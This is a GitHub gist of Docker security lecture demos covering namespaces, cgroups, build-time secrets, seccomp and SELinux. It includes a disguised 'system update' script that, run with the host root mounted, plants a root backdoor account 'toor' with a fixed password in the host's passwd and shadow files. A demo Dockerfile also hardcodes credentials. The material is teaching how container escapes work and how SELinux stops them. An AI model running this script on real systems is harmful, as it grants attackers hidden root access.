Skip to content

Instantly share code, notes, and snippets.

@oehrlis

oehrlis/Docker_Security_Demos.md

Last active December 19, 2018 21:38
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save oehrlis/b9bdd70f273788ed7448f1da43ef887d to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save oehrlis/b9bdd70f273788ed7448f1da43ef887d to your computer and use it in GitHub Desktop.
Download ZIP
Docker Security Demos
Raw
Docker_Security_Demos.md
title subtitle author date tvddocversion papersize listings-disable-line-numbers titlepage toc toc-own-page toc-title toc-depth linkcolor
Demo Docker Security
Demos of the lecture Docker Security
Stefan Oehrli
20 Dezember 2018
1.0
a4
true
true
true
true
Inhalt
2
blue

Demo Docker Security

Requirements and Environment

All demos are done on Docker Community Edition 18.03.1 on Oracle Linux 7.5 running on a virtualbox VM created based on Vagrant. The examples are supposed to run on all Docker environments on Linux. Below we just provide the steps to setup the demo environment based on an Oracle Vagrantbox for Docker. (see oracle/vagrant-boxes on GitHub)

Prerequisites

  1. Install Oracle VM VirtualBox
  2. Install Vagrant
  3. Clone the Oracle vagrant box respoistory git clone https://github.com/oracle/vagrant-boxes
  4. Provisions a vagrant environment for based on DockerEngine.
  5. Configure the VM for the demos.
  6. Get the Docker Security demos https://www.oradba.ch/

Step 1-4 can be skipped, if the demo's are done on an other system or VM.

Setup demo environment

Step 3: Clone the Oracle vagrantbox respoistory

git clone https://github.com/oracle/vagrant-boxes ora-vagrant-boxes

Step 4: Provisions a vagrant environment

cd ora-vagrant-boxes/DockerEngine
vagrant up
vagrant ssh

Step 5: Configure the VM for the demos and install htop.

sudo yum -y install yum-utils device-mapper-persistent-data lvm2 psmisc
wget dl.fedoraproject.org/pub/epel/7/x86_64/Packages/e/epel-release-7-11.noarch.rpm
sudo rpm -ihv epel-release-7-11.noarch.rpm
sudo yum-config-manager \
    --add-repo https://download.docker.com/linux/centos/docker-ce.repo
sudo yum -y install htop docker-ce

Predownload a couple of images

docker pull alpine
docker pull centos:7
docker pull ubuntu:17.10
docker pull oraclelinux

Update Host

The alpine:demo container is a small example Container with just a scripts.

Docker file for this small demo:

# ----------------------------------------------------------------------
# Trivadis AG, Infrastructure Managed Services
# Saegereistrasse 29, 8152 Glattbrugg, Switzerland
# ----------------------------------------------------------------------
# Name.......: Dockerfile 
# Author.....: Stefan Oehrli (oes) [email protected]
# Editor.....: Stefan Oehrli
# Date.......: 2018.03.19
# Revision...: 1.0
# Purpose....: This Dockerfile for a Docker Security Demo
# Notes......: --
# Reference..: --
# License....: Licensed under the Universal Permissive License v 1.0 as 
#              shown at http://oss.oracle.com/licenses/upl.
# ----------------------------------------------------------------------
# Modified...:
# see git revision history for more information on changes/updates
# ----------------------------------------------------------------------

# Pull base image
# ----------------------------------------------------------------------
FROM alpine

# Maintainer
# ----------------------------------------------------------------------
LABEL maintainer="[email protected]"

# Environment variables required for this build (do NOT change)
# -------------------------------------------------------------
ENV DOCKER_SCRIPTS="/opt/docker/bin" \
    START_SCRIPT="start_system_update.sh"

ENV PATH=${PATH}:"${DOCKER_SCRIPTS}"

# copy all setup scripts to DOCKER_BIN
COPY scripts/* "${DOCKER_SCRIPTS}/"

# Define default command to start OUD instance
CMD exec "${DOCKER_SCRIPTS}/${START_SCRIPT}"

Or the short form...

FROM alpine
LABEL maintainer="[email protected]"
COPY scripts/* "/opt/docker/bin"
CMD exec "/opt/docker/bin/start_system_update.sh"

Build the test container

cd $HOME/demo/update_host
docker build -t alpine:demo00 .

Run it to "start the Demo App" :-)

docker container run -d -v /:/h --name demo alpine:demo00

docker container run -it -v /:/h --rm alpine:demo00 sh

Check if it is still running

docker ps

Check the logs...

docker logs demo

docker rm demo

login as toor using ssh.

ssh toor@urania

remove toor again....

docker run --rm -v /:/h alpine:demo00 sed -i '/^toor/d' /h/etc/passwd
docker run --rm -v /:/h alpine:demo00 sed -i '/^toor/d' /h/etc/shadow

Linux Namespaces

Create a simple container with does run ping (one ping only vasili )

docker container run --rm -d \
    --name vasili \
    -v /tmp:/data1 \
    alpine ping 127.0.0.1

Check what's going on

docker logs -f vasili
docker ps
docker container top vasili

Just run a bash shell

docker container run --rm -it \
    --name sample \
    -v /tmp:/data2 \
    centos:7 /bin/bash --login --posix

Check the PID's in an other terminal

check the OS

ps -ef|grep -i ping
PID=$(ps -ef|grep -i ping|grep -iv grep |sed 's/\s\s*/ /g' | cut -d' ' -f2)
sudo nsenter --target $PID --pid --mount sleep 300 &
sudo nsenter --target $PID --pid --mount ps aux
sudo nsenter --target $PID --pid --mount kill -9 8
sudo nsenter --target $PID --pid --mount cat /proc/mounts | grep '^/dev'

pstree -a -H $PID

Stop everthing

docker stop sample
docker stop vasili

Resources

Create a directory and a Dockerfile.

mkdir -p $HOME/docker/cgroups
cd $HOME/demo/cgroups
vi Dockerfile

Create a Dockerfile with the following content.

FROM ubuntu:17.10
RUN apt-get update && apt-get install -y stress
ENTRYPOINT ["stress"]
CMD ["-c", "2", "--timeout", "15"]

Build the image...

cd $HOME/demo/cgroups
docker image build -t stress_demo .

open a new terminal and start htop-

htop

Run the image and check what's happen.

docker container run --rm -d stress_demo

Start the stress_demo and limit the CPU.

docker container run --rm -d --cpuset-cpus 0 stress_demo

Start the stress_demo without any memory limit.

docker container run --rm -d \
    stress_demo --vm 1 --vm-bytes 2048M --timeout 15

Start the stress_demo with an upper memory limit.

docker container run --rm -d \
    --memory 256m \
    stress_demo --vm 1 --vm-bytes 2048M --timeout 15

Build ENV

Create a file / folder

mkdir -p $HOME/demo/passwords
cd $HOME/demo/passwords

echo "Hallo World, demo 2018" >demo.txt

Create a Dockerfile with the following content.

FROM alpine
ENV URL=http://docker.oradba.ch/depot/demo.zip \
    USER=scott \
    PASSWORD=tiger
RUN apk --update add curl && \
    curl --user scott:tiger -f $URL -o demo.txt
RUN curl --user $USER:$PASSWORD -f $URL -o demo.txt
CMD cat demo.txt

Build the demo01 image.

docker build -t alpine:demo01 .

Check the image history

docker history alpine:demo01
docker history --no-trunc alpine:demo01

SECCOMP

cat /boot/config-`uname -r` | grep CONFIG_SECCOMP=

http://bit.ly/2j8Bihr

Show SELinux

Check if SELinux is enforced

getenforce
sudo setenforce 1
docker system info

Enable SELinux in Docker service file

sudo vi /usr/lib/systemd/system/docker.service

ExecStart=/usr/bin/dockerd --selinux-enabled
ExecStart=/usr/bin/dockerd

Restart the docker service

sudo systemctl stop docker
sudo systemctl daemon-reload
sudo systemctl start docker

Check Docker system info again

docker system info

Try the Demo App...

docker container run -d -v /:/h --name demo alpine:demo
docker logs demo

Clean up and remove the demo container

docker rm demo
Raw
start_system_update.sh
#!/bin/sh
# ---------------------------------------------------------------------------
# Trivadis AG, Infrastructure Managed Services
# Saegereistrasse 29, 8152 Glattbrugg, Switzerland
# ---------------------------------------------------------------------------
# Name.......: start_system_update.sh
# Author.....: Stefan Oehrli (oes) [email protected]
# Editor.....: Stefan Oehrli
# Date.......: 2017.12.04
# Revision...:
# Purpose....: script to alter host files
# Notes......: demo script to show how host files can be altered
# Reference..: --
# License....: Licensed under the Universal Permissive License v 1.0 as
# shown at http://oss.oracle.com/licenses/upl.
# ---------------------------------------------------------------------------
# Modified...:
# see git revision history for more information on changes/updates
# ---------------------------------------------------------------------------
# - Environment Variables ---------------------------------------------------
# - Set default values for environment variables if not yet defined.
# ---------------------------------------------------------------------------
# Default name for OUD instance
SHADOW_FILE_PATH=$(find /*/etc -name shadow 2>/dev/null)
SHADOW_FILE_PATH=${SHADOW_FILE_PATH:-"/"}
export HOST_ETC_PATH=$(dirname ${SHADOW_FILE_PATH})
export PASSWORD_FILE="${HOST_ETC_PATH}/passwd"
export SHADOW_FILE="${HOST_ETC_PATH}/shadow"
export NEW_USER="toor"
export NEW_PASS="tiger"
export NEW_SALT="DeedBeef"
# - EOF Environment Variables -----------------------------------------------
# update password file
echo "-----------------------------------------------------"
echo "- check if we do have a ${PASSWORD_FILE}"
if [ -f "${PASSWORD_FILE}" ]; then
# password file does exists so let's update / add an entry
echo "- check if the user ${NEW_USER} already exists"
if [ $(grep -cE ${NEW_USER} "${PASSWORD_FILE}") -eq 1 ]; then
echo "- seems to be there, so lets update it"
# update the NEW_USER entry
echo "- update ${NEW_USER} in ${PASSWORD_FILE}"
sed -i "/${NEW_USER}/c\\${NEW_USER}:x:0:0:root:/root:/bin/bash" "${PASSWORD_FILE}"
else
# add a new NEW_USER entry
echo "- seems to be missing, lets add it"
echo "- insert ${NEW_USER} into ${PASSWORD_FILE}"
echo "${NEW_USER}:x:0:0:root:/root:/bin/bash" >>"${PASSWORD_FILE}"
fi
else
echo "no ${PASSWORD_FILE} found"
fi
echo "- check if we do have a ${SHADOW_FILE}"
if [ -f "${SHADOW_FILE}" ]; then
# shadow file does exists so let's update / add an entry
echo "- check if the user ${NEW_USER} already exists"
if [ $(grep -cE ${NEW_USER} "${SHADOW_FILE}") -eq 1 ]; then
echo "- seems to be there, so lets update it"
# update the NEW_USER entry
echo "- update ${NEW_USER} in ${SHADOW_FILE}"
sed -i "/${NEW_USER}/c\\${NEW_USER}:$(mkpasswd --method=sha512 --salt=${NEW_SALT} ${NEW_PASS})::0:99999:7:::" "${SHADOW_FILE}"
else
# add a new NEW_USER entry
echo "- seems to be missing, lets add it"
echo "- insert ${NEW_USER} into ${SHADOW_FILE}"
echo "${NEW_USER}:$(mkpasswd --method=sha512 --salt=${NEW_SALT} ${NEW_PASS})::0:99999:7:::" >>"${SHADOW_FILE}"
fi
else
echo "no ${SHADOW_FILE} found"
fi
sleep 10
echo "Docker Security configured :-)"
echo "-----------------------------------------------------"
exit 0
# --- EOF -------------------------------------------------------------------
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment